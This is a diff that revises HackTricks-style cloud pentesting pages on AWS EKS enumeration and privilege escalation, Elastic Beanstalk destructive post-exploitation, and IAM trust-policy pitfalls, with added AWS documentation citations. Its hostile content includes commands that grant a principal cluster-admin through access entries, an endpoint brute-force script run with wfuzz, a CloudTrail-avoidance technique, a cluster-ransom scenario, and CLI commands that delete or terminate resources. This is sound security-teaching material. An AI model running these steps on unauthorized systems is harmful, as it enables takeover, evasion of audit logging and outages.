 ../../aws-services/aws-eks-enum.md
@@ -12,7 +10,7 @@ For mor information check
 
 ### Enumerate the cluster from the AWS Console
 
-If you have the permission **`eks:AccessKubernetesApi`** you can **view Kubernetes objects** via AWS EKS console ([Learn more](https://docs.aws.amazon.com/eks/latest/userguide/view-workloads.html)).
+If you have the permission **`eks:AccessKubernetesApi`** and the required Kubernetes RBAC permissions, you can **view Kubernetes objects** via the AWS EKS console ([learn more](https://docs.aws.amazon.com/eks/latest/userguide/view-kubernetes-resources.html)).<sup>[[1]](#references)</sup>
 
 ### Connect to AWS Kubernetes Cluster
 
@@ -23,39 +21,43 @@ If you have the permission **`eks:AccessKubernetesApi`** you can **view Kubernet
 aws eks update-kubeconfig --name aws-eks-dev
 ```
 
+`update-kubeconfig` retrieves the cluster endpoint and certificate authority and writes or merges the result into the default kubeconfig, so it normally needs permission to describe the cluster.<sup>[[2]](#references)[[4]](#references)</sup>
+
 - Not that easy way:
 
-If you can **get a token** with **`aws eks get-token --name <cluster_name>`** but you don't have permissions to get cluster info (describeCluster), you could **prepare your own `~/.kube/config`**. However, having the token, you still need the **url endpoint to connect to** (if you managed to get a JWT token from a pod read [here](aws-eks-post-exploitation/README.md#get-api-server-endpoint-from-a-jwt-token)) and the **name of the cluster**.
+If you can **get a token** with **`aws eks get-token --cluster-name <cluster_name>`** but you don't have permission to call `DescribeCluster`, you can **prepare your own `~/.kube/config`**. The token alone is not enough: `kubectl` still needs the **API endpoint**, the cluster CA, and the **cluster name** for the exec plugin. If you recovered a service-account JWT from a pod, read [here](#get-api-server-endpoint-from-a-jwt-token).<sup>[[3]](#references)[[4]](#references)[[15]](#references)</sup>
 
-In my case, I didn't find the info in CloudWatch logs, but I **found it in LaunchTemaplates userData** and in **EC2 machines in userData also**. You can see this info in **userData** easily, for example in the next example (the cluster name was cluster-name):
+The cluster name, endpoint, and CA may also be present in launch-template or EC2 user data. EKS documents passing these values to the node bootstrap script and notes that doing so avoids a `DescribeCluster` call.<sup>[[5]](#references)</sup>
 
 ```bash
-API_SERVER_URL=https://6253F6CA47F81264D8E16FAA7A103A0D.gr7.us-east-1.eks.amazonaws.com
+API_SERVER_URL=https://6253F6CA47F81264D8E16FAA7A103A0D.gr7.us-west-2.eks.amazonaws.com
 
 /etc/eks/bootstrap.sh cluster-name --kubelet-extra-args '--node-labels=eks.amazonaws.com/sourceLaunchTemplateVersion=1,alpha.eksctl.io/cluster-name=cluster-name,alpha.eksctl.io/nodegroup-name=prd-ondemand-us-west-2b,role=worker,eks.amazonaws.com/nodegroup-image=ami-002539dd2c532d0a5,eks.amazonaws.com/capacityType=ON_DEMAND,eks.amazonaws.com/nodegroup=prd-ondemand-us-west-2b,type=ondemand,eks.amazonaws.com/sourceLaunchTemplateId=lt-0f0f0ba62bef782e5 --max-pods=58' --b64-cluster-ca $B64_CLUSTER_CA --apiserver-endpoint $API_SERVER_URL --dns-cluster-ip $K8S_CLUSTER_DNS_IP --use-max-pods false
 ```
+
+The `/etc/eks/bootstrap.sh` form shown above is for Amazon Linux 2-style EKS AMIs; Amazon Linux 2023 uses `nodeadm` user data instead.<sup>[[5]](#references)</sup>
 
 <details>
 
 <summary>kube config</summary>
 
 ```yaml
-describe-cache-parametersapiVersion: v1
+apiVersion: v1
 clusters:
   - cluster:
       certificate-authority-data: LS0tLS1CRUdJTiBDRVJUSUZJQ0FURS0tLS0tCk1JSUMvakNDQWVhZ0F3SUJBZ0lCQURBTkJna3Foa2lHOXcwQkFRc0ZBREFWTVJNd0VRWURWUVFERXdwcmRXSmwKY201bGRHVnpNQjRYRFRJeU1USXlPREUyTWpjek1Wb1hEVE15TVRJeU5URTJNamN6TVZvd0ZURVRNQkVHQTFVRQpBeE1LYTNWaVpYSnVaWFJsY3pDQ0FTSXdEUVlKS29aSWh2Y05BUUVCQlFBRGdnRVBBRENDQVFvQ2dnRUJBTDlXCk9OS0ZqeXZoRUxDZGhMNnFwWkMwa1d0UURSRVF1UzVpRDcwK2pjbjFKWXZ4a3FsV1ZpbmtwOUt5N2x2ME5mUW8KYkNqREFLQWZmMEtlNlFUWVVvOC9jQXJ4K0RzWVlKV3dzcEZGbWlsY1lFWFZHMG5RV1VoMVQ3VWhOanc0MllMRQpkcVpzTGg4OTlzTXRLT1JtVE5sN1V6a05pTlUzSytueTZSRysvVzZmbFNYYnRiT2kwcXJSeFVpcDhMdWl4WGRVCnk4QTg3VjRjbllsMXo2MUt3NllIV3hhSm11eWI5enRtbCtBRHQ5RVhOUXhDMExrdWcxSDBqdTl1MDlkU09YYlkKMHJxY2lINjYvSTh0MjlPZ3JwNkY0dit5eUNJUjZFQURRaktHTFVEWUlVSkZ4WXA0Y1pGcVA1aVJteGJ5Nkh3UwpDSE52TWNJZFZRRUNQMlg5R2c4Q0F3RUFBYU5aTUZjd0RnWURWUjBQQVFIL0JBUURBZ0trTUE4R0ExVWRFd0VCCi93UUZNQU1CQWY4d0hRWURWUjBPQkJZRUZQVXFsekhWZmlDd0xqalhPRmJJUUc3L0VxZ1hNQlVHQTFVZEVRUU8KTUF5Q0NtdDFZbVZ5Ym1WMFpYTXdEUVlKS29aSWh2Y05BUUVMQlFBRGdnRUJBS1o4c0l4aXpsemx0aXRPcGcySgpYV0VUSThoeWxYNWx6cW1mV0dpZkdFVVduUDU3UEVtWW55eWJHbnZ5RlVDbnczTldMRTNrbEVMQVE4d0tLSG8rCnBZdXAzQlNYamdiWFovdWVJc2RhWlNucmVqNU1USlJ3SVFod250ZUtpU0J4MWFRVU01ZGdZc2c4SlpJY3I2WC8KRG5POGlHOGxmMXVxend1dUdHSHM2R1lNR0Mvd1V0czVvcm1GS291SmtSUWhBZElMVkNuaStYNCtmcHUzT21UNwprS3VmR0tyRVlKT09VL1c2YTB3OTRycU9iSS9Mem1GSWxJQnVNcXZWVDBwOGtlcTc1eklpdGNzaUJmYVVidng3Ci9sMGhvS1RqM0IrOGlwbktIWW4wNGZ1R2F2YVJRbEhWcldDVlZ4c3ZyYWpxOUdJNWJUUlJ6TnpTbzFlcTVZNisKRzVBPQotLS0tLUVORCBDRVJUSUZJQ0FURS0tLS0tCg==
       server: https://6253F6CA47F81264D8E16FAA7A103A0D.gr7.us-west-2.eks.amazonaws.com
-    name: arn:aws:eks:us-east-1:<acc-id>:cluster/<cluster-name>
+    name: arn:aws:eks:us-west-2:<acc-id>:cluster/<cluster-name>
 contexts:
   - context:
-      cluster: arn:aws:eks:us-east-1:<acc-id>:cluster/<cluster-name>
-      user: arn:aws:eks:us-east-1:<acc-id>:cluster/<cluster-name>
-    name: arn:aws:eks:us-east-1:<acc-id>:cluster/<cluster-name>
-current-context: arn:aws:eks:us-east-1:<acc-id>:cluster/<cluster-name>
+      cluster: arn:aws:eks:us-west-2:<acc-id>:cluster/<cluster-name>
+      user: arn:aws:eks:us-west-2:<acc-id>:cluster/<cluster-name>
+    name: arn:aws:eks:us-west-2:<acc-id>:cluster/<cluster-name>
+current-context: arn:aws:eks:us-west-2:<acc-id>:cluster/<cluster-name>
 kind: Config
 preferences: {}
 users:
-  - name: arn:aws:eks:us-east-1:<acc-id>:cluster/<cluster-name>
+  - name: arn:aws:eks:us-west-2:<acc-id>:cluster/<cluster-name>
     user:
       exec:
         apiVersion: client.authentication.k8s.io/v1beta1
@@ -78,22 +80,22 @@ users:
 
 ### From AWS to Kubernetes
 
-Historically, the **creator** of an **EKS cluster** received hidden Kubernetes admin access that was not visible in `aws-auth`. In current EKS clusters, this depends on the cluster access configuration. `bootstrapClusterCreatorAdminPermissions` controls whether the creator is added as a cluster-admin access entry during creation, and EKS access entries make that admin path visible and revocable through the EKS API. Older clusters or clusters that still rely on `aws-auth` might still have legacy creator behavior, so confirm the `accessConfig`, list access entries, and review CloudTrail instead of assuming the creator always has unremovable `system:masters`.
+In the legacy `CONFIG_MAP` authentication mode, the IAM principal that created an **EKS cluster** is initially granted hidden Kubernetes `system:masters` access and does not appear in `aws-auth`. With access entries, creator access depends on the cluster configuration: `DescribeCluster` exposes `authenticationMode` and `bootstrapClusterCreatorAdminPermissions`, and enabling access entries on older clusters can create a visible entry for the original creator. Confirm `accessConfig` and list access entries instead of assuming that the creator always has unremovable administrator access.<sup>[[4]](#references)[[6]](#references)[[7]](#references)[[8]](#references)</sup>
 
 #### Abusing configmap
 
-The traditional way to grant **access to over K8s to more AWS IAM users or roles** is using the **configmap** **`aws-auth`**.
+The legacy way to grant **Kubernetes access to additional AWS IAM users or roles** is the **`aws-auth` ConfigMap**. AWS now marks this method as deprecated where EKS access entries are available.<sup>[[6]](#references)[[7]](#references)</sup>
 
 > [!WARNING]
-> Therefore, anyone with **write access** over the config map **`aws-auth`** will be able to **compromise the whole cluster**.
+> Therefore, anyone with **write access** to the **`aws-auth`** ConfigMap can map an IAM principal to a high-privilege Kubernetes group such as `system:masters`; treat that access as equivalent to cluster compromise.<sup>[[6]](#references)[[15]](#references)</sup>
 
 For more information about how to **grant extra privileges to IAM roles & users** in the **same or different account** and how to **abuse** this to [**privesc check this page**](../../../kubernetes-security/abusing-roles-clusterroles-in-kubernetes/index.html#aws-eks-aws-auth-configmaps).
 
-Check also[ **this awesome**](https://blog.lightspin.io/exploiting-eks-authentication-vulnerability-in-aws-iam-authenticator) **post to learn how the authentication IAM -> Kubernetes work**.
+For the underlying IAM-to-Kubernetes token flow, read the [AWS IAM Authenticator protocol documentation](https://github.com/kubernetes-sigs/aws-iam-authenticator#how-does-it-work).<sup>[[15]](#references)</sup> The existing [Lightspin write-up](https://blog.lightspin.io/exploiting-eks-authentication-vulnerability-in-aws-iam-authenticator) provides additional context.<sup>[[18]](#references)</sup>
 
 #### Abusing Access Entries
 
-AWS implements an additional way to grant IAM users access to the Kubernetes cluster through access entries. If you have the `eks:CreateAccessEntry` and `eks:AssociateAccessPolicy` permissions, you may also be able to assign a Kubernetes administrator role to either your user or a specific role.
+EKS access entries provide an API-based way to grant IAM users or roles Kubernetes permissions. They require a cluster authentication mode that includes the EKS API; with `eks:CreateAccessEntry` and `eks:AssociateAccessPolicy`, a principal may be able to create a `STANDARD` entry and attach an administrator policy to itself or another role.<sup>[[7]](#references)[[9]](#references)[[10]](#references)</sup>
 
 First, **create an access entry for your user or role**:
 
@@ -107,9 +109,9 @@ With that entry created, you may now be able to assign a policy directly to it. 
 aws eks associate-access-policy --cluster-name <cluster_name> --region <region> --principal-arn <arn_from_your_user_or_role> --policy-arn arn:aws:eks::aws:cluster-access-policy/AmazonEKSClusterAdminPolicy --access-scope type=cluster
 ```
 
-You can search for this policy in AWS official documentation [**here**](https://docs.aws.amazon.com/eks/latest/userguide/access-policy-permissions.html#access-policy-permissions-amazoneksclusteradminpolicy)
+You can search for this policy in AWS official documentation [**here**](https://docs.aws.amazon.com/eks/latest/userguide/access-policy-permissions.html#access-policy-permissions-amazoneksclusteradminpolicy). The cluster scope applies the policy across all Kubernetes namespaces, and `AmazonEKSClusterAdminPolicy` grants administrator access at cluster scope.<sup>[[10]](#references)[[11]](#references)</sup>
 
-From this point on, you may now be able to request a *k8s* token and interact with the cluster as an administrator:
+After the access entry and policy propagate, you may be able to request a *Kubernetes* token and interact with the cluster as an administrator.<sup>[[3]](#references)[[9]](#references)</sup>
 
 ```
 aws eks get-token --cluster-name <cluster_name> --output json | jq -r '.status.token'
@@ -117,17 +119,30 @@ aws eks get-token --cluster-name <cluster_name> --output json | jq -r '.status.t
 
 ### From Kubernetes to AWS
 
-It's possible to allow an **OpenID authentication for kubernetes service account** to allow them to assume roles in AWS. Learn how [**this work in this page**](../../../kubernetes-security/kubernetes-pivoting-to-clouds.md#workflow-of-iam-role-for-service-accounts-1).
+Kubernetes workloads can reach AWS through **IAM Roles for Service Accounts (IRSA)** or the newer **EKS Pod Identity** mechanism. Learn how [**IRSA works in this page**](../../../kubernetes-security/kubernetes-pivoting-to-clouds.md#workflow-of-iam-role-for-service-accounts-1); compare both mechanisms in the [AWS workload access documentation](https://docs.aws.amazon.com/eks/latest/userguide/service-accounts.html).<sup>[[12]](#references)[[13]](#references)</sup>
 
 ### GET Api Server Endpoint from a JWT Token
 
-Decoding the JWT token we get the cluster id & also the region. ![image](https://github.com/HackTricks-wiki/hacktricks-cloud/assets/87022719/0e47204a-eea5-4fcb-b702-36dc184a39e9) Knowing that the standard format for EKS url is
+The pictured token is a projected Kubernetes service-account JWT. Its `iss` claim identifies the EKS OIDC issuer and exposes the issuer region and ID; it does **not** directly provide the Kubernetes API endpoint.<sup>[[12]](#references)[[13]](#references)</sup>
+
+![image](https://github.com/HackTricks-wiki/hacktricks-cloud/assets/87022719/0e47204a-eea5-4fcb-b702-36dc184a39e9)
+
+If you can call `DescribeCluster`, retrieve the endpoint and CA directly:
 
 ```bash
-https://<cluster-id>.<two-random-chars><number>.<region>.eks.amazonaws.com
+aws eks describe-cluster --name <cluster_name> --query 'cluster.endpoint' --output text
+aws eks describe-cluster --name <cluster_name> --query 'cluster.certificateAuthority.data' --output text
 ```
 
-Didn't find any documentation that explain the criteria for the 'two chars' and the 'number'. But making some test on my behalf I see recurring these one:
+AWS documents the endpoint as a unique value under `cluster.endpoint`; older IPv4 clusters use an `eks.amazonaws.com` hostname, while newer IPv6 clusters may use the `api.aws` dual-stack format.<sup>[[4]](#references)[[14]](#references)</sup>
+
+If you already recovered the legacy IPv4 endpoint identifier from node or launch-template data but not its short suffix, the following empirical technique can test common suffixes. It is not an AWS-guaranteed naming rule and does not cover the newer `api.aws` endpoints.
+
+```bash
+https://<endpoint-id>.<legacy-suffix>.<region>.eks.amazonaws.com
+```
+
+Some observed legacy suffixes are:
 
 - gr7
 - yl4
@@ -138,12 +153,10 @@ Anyway are just 3 chars we can bruteforce them. Use the below script for generat
 from itertools import product
 from string import ascii_lowercase
 
-letter_combinations = product('abcdefghijklmnopqrstuvwxyz', repeat = 2)
-number_combinations = product('0123456789', repeat = 1)
-
 result = [
-	f'{''.join(comb[0])}{comb[1][0]}'
-	for comb in product(letter_combinations, number_combinations)
+    f'{letters}{number}'
+    for letters in map(''.join, product(ascii_lowercase, repeat=2))
+    for number in '0123456789'
 ]
 
 with open('out.txt', 'w') as f:
@@ -153,32 +166,50 @@ with open('out.txt', 'w') as f:
 Then with wfuzz
 
 ```bash
-wfuzz -Z -z file,out.txt --hw 0 https://<cluster-id>.FUZZ.<region>.eks.amazonaws.com
+wfuzz -Z -z file,out.txt --hw 0 https://<endpoint-id>.FUZZ.<region>.eks.amazonaws.com
 ```
 
 > [!WARNING]
-> Remember to replace & .
+> Replace `<endpoint-id>` and `<region>`, and test only the suffixes relevant to the endpoint format.
 
 ### Bypass CloudTrail
 
-If an attacker obtains credentials of an AWS with **permission over an EKS**. If the attacker configures it's own **`kubeconfig`** (without calling **`update-kubeconfig`**) as explained previously, the **`get-token`** doesn't generate logs in Cloudtrail because it doesn't interact with the AWS API (it just creates the token locally).
+If an attacker obtains credentials for an IAM principal with **EKS access**, manually configuring a **`kubeconfig`** avoids the `DescribeCluster` lookup normally performed by **`update-kubeconfig`**. The **`get-token`** client creates a short-lived, presigned authentication token locally; it does not need an EKS API call merely to mint that token.<sup>[[2]](#references)[[3]](#references)[[15]](#references)</sup>
 
-So when the attacker talks with the EKS cluster, **cloudtrail won't log anything related to the user being stolen and accessing it**.
+This is not complete invisibility. Kubernetes audit and EKS authenticator/control-plane logs can record cluster access when enabled, and AWS documents that console resource reads generate an `AccessKubernetesApi` CloudTrail event.<sup>[[1]](#references)[[16]](#references)</sup>
 
-Note that the **EKS cluster might have logs enabled** that will log this access (although, by default, they are disabled).
+By default, EKS control-plane logs are not exported to CloudWatch; check the cluster's logging configuration when assessing visibility.<sup>[[16]](#references)</sup>
 
 ### EKS Ransom?
 
-By default the **user or role that created** a cluster is **ALWAYS going to have admin privileges** over the cluster. And that the only "secure" access AWS will have over the Kubernetes cluster.
+A cluster can still become operationally **ransomable** if every reachable administrator path is removed. In legacy ConfigMap mode, disabling the hidden creator and deleting the remaining mappings can strand access; in access-entry mode, an independent AWS principal may be able to restore access through the EKS API. Treat this as a recovery and availability risk, not as a guarantee that the creator is permanently an administrator.<sup>[[6]](#references)[[8]](#references)</sup>
 
-So, if an **attacker compromises a cluster using fargate** and **removes all the other admins** and d**eletes the AWS user/role that created** the Cluster, ~~the attacker could have **ransomed the cluste**~~**r**.
+For example, an attacker who compromises a Fargate-only cluster, removes other admins, and disables or deletes the creator principal may leave no usable recovery identity.
 
 > [!TIP]
-> Note that if the cluster was using **EC2 VMs**, it could be possible to get Admin privileges from the **Node** and recover the cluster.
+> Note that if the cluster has **EC2 nodes**, inspect the node IAM role and its EKS access mapping; a node is not automatically a cluster administrator, but a correctly authorized role may provide a recovery path. Fargate runs Pods without customer-managed EC2 nodes.
 >
-> Actually, If the cluster is using Fargate you could EC2 nodes or move everything to EC2 to the cluster and recover it accessing the tokens in the node.
+> Adding EC2 capacity to a Fargate-only cluster does not itself restore administrator access; the new node role must already be authorized or be granted access through an independent AWS principal.<sup>[[7]](#references)[[17]](#references)</sup>
+
+## References
+
+- [1] [View Kubernetes resources in the AWS Management Console](https://docs.aws.amazon.com/eks/latest/userguide/view-kubernetes-resources.html)
+- [2] [update-kubeconfig — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/eks/update-kubeconfig.html)
+- [3] [get-token — AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/eks/get-token.html)
+- [4] [DescribeCluster — Amazon EKS API Reference](https://docs.aws.amazon.com/eks/latest/APIReference/API_DescribeCluster.html)
+- [5] [Customize managed nodes with launch templates — Amazon EKS](https://docs.aws.amazon.com/eks/latest/userguide/launch-templates.html)
+- [6] [Grant IAM users access to Kubernetes with a ConfigMap — Amazon EKS](https://docs.aws.amazon.com/eks/latest/userguide/auth-configmap.html)
+- [7] [Grant IAM users and roles access to Kubernetes APIs — Amazon EKS](https://docs.aws.amazon.com/eks/latest/userguide/grant-k8s-access.html)
+- [8] [Grant IAM users access to Kubernetes with EKS access entries — Amazon EKS](https://docs.aws.amazon.com/eks/latest/userguide/access-entries.html)
+- [9] [Create access entries — Amazon EKS](https://docs.aws.amazon.com/eks/latest/userguide/creating-access-entries.html)
+- [10] [Associate access policies with access entries — Amazon EKS](https://docs.aws.amazon.com/eks/latest/userguide/access-policies.html)
+- [11] [Review access policy permissions — Amazon EKS](https://docs.aws.amazon.com/eks/latest/userguide/access-policy-permissions.html#access-policy-permissions-amazoneksclusteradminpolicy)
+- [12] [IAM roles for service accounts — Amazon EKS](https://docs.aws.amazon.com/eks/latest/userguide/iam-roles-for-service-accounts.html)
+- [13] [Grant Kubernetes workloads access to AWS using Kubernetes Service Accounts — Amazon EKS](https://docs.aws.amazon.com/eks/latest/userguide/service-accounts.html)
+- [14] [Cluster API server endpoint — Amazon EKS](https://docs.aws.amazon.com/eks/latest/userguide/cluster-endpoint.html)
+- [15] [AWS IAM Authenticator for Kubernetes](https://github.com/kubernetes-sigs/aws-iam-authenticator)
+- [16] [Send control plane logs to CloudWatch Logs — Amazon EKS](https://docs.aws.amazon.com/eks/latest/userguide/control-plane-logs.html)
+- [17] [Manage compute resources by using nodes — Amazon EKS](https://docs.aws.amazon.com/eks/latest/userguide/eks-compute.html)
+- [18] [Exploiting an EKS authentication vulnerability in AWS IAM Authenticator](https://blog.lightspin.io/exploiting-eks-authentication-vulnerability-in-aws-iam-authenticator)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-elastic-beanstalk-post-exploitation/README.md
@@ -1,7 +1,5 @@
 # AWS - Elastic Beanstalk Post Exploitation
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## Elastic Beanstalk
 
 For more information:
@@ -15,70 +13,89 @@ For more information:
 > [!NOTE]
 > TODO: Test if more permissions are required for this
 
-An attacker with the permission `elasticbeanstalk:DeleteApplicationVersion` can **delete an existing application version**. This action could disrupt application deployment pipelines or cause loss of specific application versions if not backed up.
+An attacker with the permission `elasticbeanstalk:DeleteApplicationVersion` can **delete an application version from Elastic Beanstalk**. A version associated with a running environment cannot be deleted; unless `--delete-source-bundle` is supplied, its source bundle remains in Amazon S3.<sup>[[1]](#references)[[2]](#references)[[3]](#references)[[4]](#references)</sup>
 
 ```bash
 aws elasticbeanstalk delete-application-version --application-name my-app --version-label my-version
 ```
 
-**Potential Impact**: Disruption of application deployment and potential loss of application versions.
+**Potential Impact**: Loss of a rollback or deployment artifact from Elastic Beanstalk and disruption of deployment workflows; the source bundle remains in Amazon S3 by default.<sup>[[2]](#references)[[3]](#references)</sup>
 
 ### `elasticbeanstalk:TerminateEnvironment`
 
 > [!NOTE]
 > TODO: Test if more permissions are required for this
 
-An attacker with the permission `elasticbeanstalk:TerminateEnvironment` can **terminate an existing Elastic Beanstalk environment**, causing downtime for the application and potential data loss if the environment is not configured for backups.
+An attacker with the permission `elasticbeanstalk:TerminateEnvironment` can **terminate an Elastic Beanstalk environment**. The default `TerminateResources=true` also shuts down associated AWS resources such as the Auto Scaling group and load balancer; setting it to `false` removes Elastic Beanstalk management while leaving those resources running.<sup>[[1]](#references)[[5]](#references)[[6]](#references)[[7]](#references)</sup>
 
 ```bash
 aws elasticbeanstalk terminate-environment --environment-name my-existing-env
 ```
 
-**Potential Impact**: Downtime of the application, potential data loss, and disruption of services.
+**Potential Impact**: Application downtime and possible data loss when environment-managed data resources are not configured to be retained or snapshotted before termination.<sup>[[5]](#references)[[6]](#references)</sup>
 
 ### `elasticbeanstalk:DeleteApplication`
 
 > [!NOTE]
 > TODO: Test if more permissions are required for this
 
-An attacker with the permission `elasticbeanstalk:DeleteApplication` can **delete an entire Elastic Beanstalk application**, including all its versions and environments. This action could cause a significant loss of application resources and configurations if not backed up.
+An attacker with the permission `elasticbeanstalk:DeleteApplication` can **delete an Elastic Beanstalk application** and its associated versions and configurations. Running environments must be terminated first, or `--terminate-env-by-force` can terminate them as part of the deletion; application source bundles are not deleted from Amazon S3 by this API.<sup>[[1]](#references)[[8]](#references)[[9]](#references)[[10]](#references)</sup>
 
 ```bash
 aws elasticbeanstalk delete-application --application-name my-app --terminate-env-by-force
 ```
 
-**Potential Impact**: Loss of application resources, configurations, environments, and application versions, leading to service disruption and potential data loss.
+**Potential Impact**: Termination of associated environments and loss of tracked versions and saved configurations, leading to service disruption; source bundles may still remain in Amazon S3.<sup>[[8]](#references)[[9]](#references)</sup>
 
 ### `elasticbeanstalk:SwapEnvironmentCNAMEs`
 
 > [!NOTE]
 > TODO: Test if more permissions are required for this
 
-An attacker with the `elasticbeanstalk:SwapEnvironmentCNAMEs` permission can **swap the CNAME records of two Elastic Beanstalk environments**, which might cause the wrong version of the application to be served to users or lead to unintended behavior.
+An attacker with the `elasticbeanstalk:SwapEnvironmentCNAMEs` permission can **swap the CNAME records of two Elastic Beanstalk environments**. Because a CNAME swap redirects traffic between environments, it can cause the wrong application version to be served or alter production routing unexpectedly.<sup>[[1]](#references)[[11]](#references)[[12]](#references)[[13]](#references)</sup>
 
 ```bash
 aws elasticbeanstalk swap-environment-cnames --source-environment-name my-env-1 --destination-environment-name my-env-2
 ```
 
-**Potential Impact**: Serving the wrong version of the application to users or causing unintended behavior in the application due to swapped environments.
+**Potential Impact**: Traffic can be redirected to an unintended environment or version, causing incorrect application behavior or availability issues.<sup>[[11]](#references)[[12]](#references)</sup>
 
 ### `elasticbeanstalk:AddTags`, `elasticbeanstalk:RemoveTags`
 
 > [!NOTE]
 > TODO: Test if more permissions are required for this
 
-An attacker with the `elasticbeanstalk:AddTags` and `elasticbeanstalk:RemoveTags` permissions can **add or remove tags on Elastic Beanstalk resources**. This action could lead to incorrect resource allocation, billing, or resource management.
+An attacker with the `elasticbeanstalk:AddTags` permission can **add or update tags**, while `elasticbeanstalk:RemoveTags` permits removing tag keys through `UpdateTagsForResource`. The operation accepts the ARN of an Elastic Beanstalk resource.<sup>[[1]](#references)[[14]](#references)[[15]](#references)</sup>
 
 ```bash
-aws elasticbeanstalk add-tags --resource-arn arn:aws:elasticbeanstalk:us-west-2:123456789012:environment/my-app/my-env --tags Key=MaliciousTag,Value=1
+aws elasticbeanstalk update-tags-for-resource \
+  --resource-arn arn:aws:elasticbeanstalk:us-west-2:123456789012:environment/my-app/my-env \
+  --tags-to-add Key=MaliciousTag,Value=1
 
-aws elasticbeanstalk remove-tags --resource-arn arn:aws:elasticbeanstalk:us-west-2:123456789012:environment/my-app/my-env --tag-keys MaliciousTag
+aws elasticbeanstalk update-tags-for-resource \
+  --resource-arn arn:aws:elasticbeanstalk:us-west-2:123456789012:environment/my-app/my-env \
+  --tags-to-remove MaliciousTag
 ```
 
-**Potential Impact**: Incorrect resource allocation, billing, or resource management due to added or removed tags.
+**Potential Impact**: Tag-based automation, inventory, cost allocation, or access controls can receive incorrect data after tags are added, changed, or removed.<sup>[[1]](#references)[[14]](#references)</sup>
+
+## References
+
+- [1] [Actions, resources, and condition keys for AWS Elastic Beanstalk](https://docs.aws.amazon.com/service-authorization/latest/reference/list_elasticbeanstalk.html)
+- [2] [DeleteApplicationVersion - AWS Elastic Beanstalk API Reference](https://docs.aws.amazon.com/elasticbeanstalk/latest/api/API_DeleteApplicationVersion.html)
+- [3] [Managing application versions - AWS Elastic Beanstalk](https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/applications-versions.html)
+- [4] [delete-application-version - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/elasticbeanstalk/delete-application-version.html)
+- [5] [TerminateEnvironment - AWS Elastic Beanstalk API Reference](https://docs.aws.amazon.com/elasticbeanstalk/latest/api/API_TerminateEnvironment.html)
+- [6] [Terminate an Elastic Beanstalk environment - AWS Elastic Beanstalk](https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/using-features.terminating.html)
+- [7] [terminate-environment - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/elasticbeanstalk/terminate-environment.html)
+- [8] [DeleteApplication - AWS Elastic Beanstalk API Reference](https://docs.aws.amazon.com/elasticbeanstalk/latest/api/API_DeleteApplication.html)
+- [9] [Managing Elastic Beanstalk applications - AWS Elastic Beanstalk](https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/applications.html)
+- [10] [delete-application - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/elasticbeanstalk/delete-application.html)
+- [11] [SwapEnvironmentCNAMEs - AWS Elastic Beanstalk API Reference](https://docs.aws.amazon.com/elasticbeanstalk/latest/api/API_SwapEnvironmentCNAMEs.html)
+- [12] [Blue/Green deployments with Elastic Beanstalk - AWS Elastic Beanstalk](https://docs.aws.amazon.com/elasticbeanstalk/latest/dg/using-features.CNAMESwap.html)
+- [13] [swap-environment-cnames - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/elasticbeanstalk/swap-environment-cnames.html)
+- [14] [UpdateTagsForResource - AWS Elastic Beanstalk API Reference](https://docs.aws.amazon.com/elasticbeanstalk/latest/api/API_UpdateTagsForResource.html)
+- [15] [update-tags-for-resource - AWS CLI Command Reference](https://docs.aws.amazon.com/cli/latest/reference/elasticbeanstalk/update-tags-for-resource.html)
 
 {{#include ../../../../banners/hacktricks-training.md}}
-
-
-
 

--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-iam-post-exploitation/README.md
@@ -1,7 +1,5 @@
 # AWS - IAM Post Exploitation
 
-{{#include ../../../../banners/hacktricks-training.md}}
-
 ## IAM
 
 For more information about IAM access:
@@ -12,15 +10,15 @@ For more information about IAM access:
 
 ## Confused Deputy Problem
 
-If you **allow an external account (A)** to access a **role** in your account, you will probably have **0 visibility** on **who can exactly access that external account**. This is a problem, because if another external account (B) can access the external account (A) it's possible that **B will also be able to access your account**.
+If you **allow an external account (A)** to access a **role** in your account, you will probably have **0 visibility** on **who can exactly access that external account**. This is a problem, because if another external account (B) can access the external account (A) it's possible that **B will also be able to access your account**.<sup>[[1]](#references)</sup>
 
-Therefore, when allowing an external account to access a role in your account it's possible to specify an `ExternalId`. This is a "secret" string that the external account (A) **need to specify** in order to **assume the role in your organization**. As the **external account B won't know this string**, even if he has access over A he **won't be able to access your role**.
+Therefore, when allowing an external account to access a role in your account it's possible to specify an `ExternalId`. This is an identifier that the external account (A) **needs to specify** in order to **assume the role in your organization**. As the **external account B won't know this identifier**, even if it has access over A it **won't be able to access your role**.<sup>[[1]](#references)</sup>
 
 <figure><img src="../../../images/image (95).png" alt=""><figcaption></figcaption></figure>
 
-However, note that this `ExternalId` "secret" is **not a secret**, anyone that can **read the IAM assume role policy will be able to see it**. But as long as the external account A knows it, but the external account **B doesn't know it**, it **prevents B abusing A to access your role**.
+However, note that this `ExternalId` is **not a secret**: anyone that can **read the IAM assume role policy will be able to see it**. Its purpose is to distinguish the circumstances in which the trusted third party is acting, so it **prevents B abusing A to access your role** when each customer has a distinct value.<sup>[[1]](#references)</sup>
 
-Example:
+A role trust policy can enforce the external ID as follows.<sup>[[1]](#references)</sup>
 
 ```json
 {
@@ -55,7 +53,7 @@ Example:
 }
 ```
 
-This policy **allows all AWS** to assume the role.
+This policy **allows all AWS principals** to assume the role. AWS warns that a wildcard `Principal` in an `Allow` statement can grant public or anonymous access, including in IAM role trust policies.<sup>[[2]](#references)</sup>
 
 #### Service as principal
 
@@ -68,9 +66,9 @@ This policy **allows all AWS** to assume the role.
 }
 ```
 
-This policy **allows any account** to configure their apigateway to call this Lambda.
